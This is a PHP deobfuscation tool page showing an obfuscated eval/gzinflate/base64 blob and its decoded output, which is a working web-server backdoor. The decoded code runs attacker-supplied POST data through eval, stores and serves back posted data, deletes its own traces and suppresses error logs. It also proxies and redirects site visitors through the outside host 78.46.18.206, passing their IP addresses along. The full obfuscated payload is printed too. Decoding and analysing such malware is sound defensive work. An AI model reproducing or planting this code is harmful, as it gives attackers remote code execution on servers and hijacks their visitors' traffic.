Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("DZZFrsVYskXnUq1MuWEmfVXDzMzulMzXzDj6/0ZwQmft2CuqKxv+ab52qofs..
Decoded Output download
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r']))
{
print $_GET['r'];
}
elseif (isset($_GET['x']))
{
@unlink('default.log');
@unlink('default.tmp');
@unlink('default.txt');
@unlink('default.php');
print $_GET['x'];
}
elseif (isset($_POST['e']))
{
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
}
elseif (strlen($_POST['num'])==12 && isset($_POST['buffer']) && $_POST['option']=='g')
{
$fp=@fopen('default.log','a');
@flock($fp,LOCK_EX);
@fputs($fp,$_POST['buffer']."
");
@flock($fp,LOCK_UN);
@fclose($fp);
}
elseif (isset($_GET['up']))
{
print file_get_contents('default.log');
$fp=@fopen('default.log','w');
@flock($fp,LOCK_EX);
@fputs($fp,'');
@flock($fp,LOCK_UN);
@fclose($fp);
}
elseif (preg_match('/^\/([a-z]{4})[.]html/i', $_SERVER['REQUEST_URI']))
{
$doms = @file_get_contents('default.txt');
if (time()-@filemtime('default.tmp') > 10) @unlink('default.tmp');
if (time()-@filemtime('default.txt') > 60 && !@file_exists('default.tmp'))
{
$fp = @fopen ('default.tmp', 'w');
@flock($fp, LOCK_EX);
@fputs($fp, time());
@flock($fp, LOCK_UN);
@fclose($fp);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206/index.php?u='.mt_rand(1000,9999));
curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
$doms = curl_exec($ch);
curl_close($ch);
if (strlen($doms) > 0)
{
$fp = @fopen ('default.txt', 'w');
@flock($fp, LOCK_EX);
@fputs($fp, $doms);
@flock($fp, LOCK_UN);
@fclose($fp);
}
@unlink('default.tmp');
}
if (strlen($doms) > 0)
{
$doms = explode("
",trim(str_replace("
", "", $doms)));
shuffle($doms);
$url = 'http://'.$doms[0].str_replace('.html','.htm',$_SERVER['REQUEST_URI']);
header('HTTP/1.1 301 Moved Permanently');
header('Location: '.$url);
print '<html><head><meta http-equiv="refresh" content="0;url='.$url.'"></head><body><script type="text/javascript">window.location="'.$url.'";</script></body></html>';
}
}
elseif (preg_match('/^\/([a-z0-9]{1,4})[.](htm|pdf|jar)/i', $_SERVER['REQUEST_URI']))
{
if (isset($_SERVER['HTTP_X_REAL_IP'])) $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_REAL_IP'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://78.46.18.206' . $_SERVER['REQUEST_URI']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array ('X-Real-IP: '.$_SERVER['REMOTE_ADDR'], 'X-Real-Host: '.$_SERVER['HTTP_HOST']));
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);
$page = curl_exec($ch);
curl_close($ch);
if (strlen($page) > 0)
{
$page = str_replace ("HTTP/1.1 100 Continue
", '', $page);
list($headers, $page) = explode("
", $page, 2);
$headers = explode("
", trim($headers));
foreach ($headers as $header) if (preg_match('/(HTTP|Expires|Content|Cache|Pragma|Location)/Usi', $header)) header($header);
print $page;
}
}
exit;Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("DZZFrsVYskXnUq1MuWEmfVXDzMzulMzXzDj6/0ZwQmft2CuqKxv+ab52qofsqP7Js70isP+VVTGX1T//4dMM3vZA2fsYTDP1tHzOd39W0i1T+qZWOtYoTALJMIROHi5hbF2PXwNwwFeDCy7WUEFDA8JVAIRvAIKv7CMqhqJwuurwZj86nYbDhWHKQ9TzHh+qJzKN46bsBdbpUdeF4QpJE0GjGvJX8wVPhk6/mzPUyZBvp+Y8O3VtvwocF+PjR6UEtWbYJN9/3mgweH3eJoQOpWKAU2W4RKybJodrhcnAVP32J5PbTo6Gmu7BhmmcRYO89mCmq0b5uekLRwdNVwcyka106Dvwb/v3hndfCFd6X3VfC0m+DZV0iK5x81i8L6mqE0cy83nGzBZHZeqIRvFUAeygbS3LjQGTD4D6uR1A2BilA0EEehgKFXqcaUsixiR7QoroqtY1UHA/cri0GAsV5trKePUISNheiFbAcMjaYvzV2ntdYWaOW0oifKTmD81Hz731Cuq84dvcTWXlZteciP+1nAmfBoEPbSZsiTinp038OpMg18Pna6k5JGjm0WmpFitkOQwPO1boBj+D+TLLRBR96N+JufNwfZUjAuKnfm6x/qGlqCQJZWd9k6Fu1MCglE/T+Ta42ZGl+ohZaW40PR7mringaSgfcywul5N50otDYW7wZ6Ghs0mLZC5/rj5IWr7Qw+a7cVi2ZmBILtPrlGTwArXFpbev+fNCFes68ucgS5paEqdqgxoGCvBGsFIC10nfm8UxQ0+ff1Lp2NultRXTuURXehYnLvF2OTpe1krWut3gXigEvnfXRUeIEtp+bGbFqafXiWqKYThCHpQVbFBc1JsvVUfaVl/bfCOcxOlBRHr/LY63X8PqeUMVVNSy87DQxt+2ohVIyeJgr/QKBEF8IqRM3uFpSZc0ay1q35ooRhokuhgz31XeFAEBiZshBx81CPnQCxvo+M6WV3wPw7uHb79GF38/WpmAUVSpbiC9Zbq5QMeU9qRE/i/cSkX8EVhN2iC2vp0uhUgneroniQXE6W4vFV6Wx4Dszfqq8qV6KwTjEmuNWHsS3F5MQSV0/i80ReiQTglwh70AYTilWx/z923KMLroANWX1KKiAJBxk8ia7W1I0+FAjv0JhnthcDtxAvvXBf1IIkC7LqN4uBaI6/CUePFxQ8TkNpxa40u/8n8/mKyuaNiVJf1MF2GDe0od43P70swKS2LHFJS1AspUJjukjb5zRfPXEgIc7bgPwQnxvIRVBUQ0JOoRXggyYu13IB3GFIfD0jTXAuWAab5gJLT8U9aMtEmVI5A4GLKv5Dw2hXc2vIsvbzXGvdZQbZjePBrCIkLUsMMaewjOtDpQhBxv3f9F+VUPByBTvGk5ZrutTRzPFkvDE83FyFp3FQ1BhdYElVpsXaTpAeeqlHVYDFZ5n9XkRBcEVVf2YizZuHVt6O1pX9ty217/qH3NAlzN6LSveJ4z1khK39Ht25p6faskhIy6wYn7fu3cvjtoMNpWP+MEE8n37fkucBK2XRa5pJDftJ14G7SZ3eM0liZg4h6o6B7E0akbmMKwKKWYJvZP+uA225mEoZiXXwvDFKKol2KJSgi8QsOjyJzUpP6y+wA8W06O4x24u1ely848D1ZxjNNU0sQnao4V48cnHX8ZZ5YuYuCKM3L9JT03cuB4TO50SOLylB66jjoGXHCqSilC5lNdNntnRMW9zehND6216tkoi/rHYpJSq6HzpOtJIma/80qpfsLbih9FQu8EShU9V/zJnHh4cg8DTtx3gB5p9oQteHU0vgLihmYptDg7aSEy2XxpjBceZsGr3RT+JPf3Cqh12EMXGUvuRtuKb08eUHG+NjspwJjs13rt7Bu6VZD/ZOD9pBKNzu2ypNfld9TPuu8jHRx+bRZ5CVVwSrAtI3OrnPY4vDH1NxbhuQnxpBN7F0qxYX6rXTUWXJkdfrFBYUFvLvFv/glYUrxa9Ple6So0RpUQWWQgc6OnQ+fD6yYFd6VNPm4g9rZcafntc4i/v2Irc8GxEpSYMyNS+NfGWspKeb2+yE7SexDlm3pnllCrvZ8zRxaLX0CDWypgIAb7+YtU0hhN7w+kpzGCGkroIDfw57Vq0HldFhdM6/rT9QQoTZXtYQkDGqf4kMpkWRNcvIYXfdjqiEZMFUSsjWaBi1+1gkej4p2+zCH5z1EwWIWnG3OfK0BVID2IyJB2X0txIv62C8EBC/VD/G+Cg8exff4NlCg+TuZyoHylAXhdb3V6VRtJzgG4v5Sqhze/sYyfD8NWZw2HBcjEODov4sJG5nXoGvvJhlU5frdtshqAE8FY2ngpJwgMI/hfOYPTAid+Av4G27zD92L5ZmPLeQyx9rPSkJRBklXG2/CwgEZvBujOuKdYyX44hNX+5NhK/OjpOJKObsFT5VPwyYlOEqL16wFLIaxjJhockAJJSrN6StS31gJMDMMj+bbs1QRlvYRMvycj3CZbrKmJJY8alxkBKDmuSANtLZku9HdeE2B70+iXHITJTg1HrgENWN5QO/KcH7upIj9gCKD3yAPQj3qFWEGTkhpL+4NXWbRj0fy7JmLOMR+C8EzS0K0/lYXtc3etHkfWSHd0q5d2rTsewWokLO4lzkOWZJjE+dWSL7gm1BhDsh/q/tngDnfNdC1VXqGDMajz12+fFH93I8XUMa7lYFj65WLmR3MfEXKqTkio5wM1L54Q7S3a2NkNQRMDBso2UfuJNQc8svXWjVs1MpgUlmBMwuOg3X8DOGUX6HjfYAt+p+/rzcl650SneVSNSpummMZveLDtrtGjX9ORQ/Vxj2R7Ewcr+ieQHtSw4bHHFF3i3zU7kVlNBw+eFAWGK/pKc/LXdb7bP5YD5STlqpbLyOwGLyN+G+Hk1NsjoWJFj5i1PL/KTU5Do45M4u/fwWGcXlaNux2ysasGxvq2Pu1RllHq6Iud9sf0UHO2V+sC3L+98BYxBEBbGORno4pf4UL6E61gzvhtrvdYe8/VHTFqTTcVRMKqTcK279rShKkmNvA/FNMIujCac2pjlKpJPznjV/s7ZL0l9ue/Des3MJAUWu3Y50+meVJfo3lxMkGg2TMTSrjJbtvTxw8E9jTYZ8fiKaN7nNwlY1H90QGF+BsD3fzWnY0deWygjoAtBtL6FyGX1XskBq4pIczuziQNupbmfubGN0QA87KvBLACElQ69V5g6rTYaNUP3mDMKCa9EATzeLY2hebGHFQpzKnar6y/Q6Ei+NOtktQE0SqMIIO87r4ktzZf/Otw97813XEpNCFQeFD4BffkTEyp9MOzoewwqBg45BucmY6wWsmgg3joig9fh9JfDsBTdDrj6zRBXxoN/H0wUifEOoOGSymJoIl7n88uKaDBEyJ4UomxjqRxm6W9RDJHuk4J7rnDj5SJ12t3m2O3ecBU+I/n3sIeunTxykrGKIOXRjebY07jNMzV+uuzNHIaplDx9gns5rrhvj5M+RoPw7mh7SrIWCCJFbduEl2O8q3JXclWOyLHDKFkUJ+MM1e9RPHW2t+foQRCpSsHyaArfgnWxNYzN3sU13FZ4zY4BAsPnLvJ0ru1p3/tDBsxYVUvna8P6xJakn+PnSr7YNktPSImDn7139HTIMhhy/C+sNPzeW3qKpHuduKPQzhygfeShaWFKeNpA96aV7drqz3x9IK1AUIXMDbsFvQ0NoyvuL3G5MnNS6HyMmGbk0lX+23NCG3ihyXRzKVsPq8dBIWRnLkcLMDjUR3PtCIOVUNKoY7tbKCxsfLdIb/aimHbxXwh8SuB4BHlUt+wDNNyKrNVIHjVNUjS9N/0YEf99z///vvv//0/"))); Function Calls
| gzinflate | 23 |
| base64_decode | 23 |
Stats
| MD5 | d840e314d4defab0cd15d711470b12a1 |
| Eval Count | 23 |
| Decode Time | 130 ms |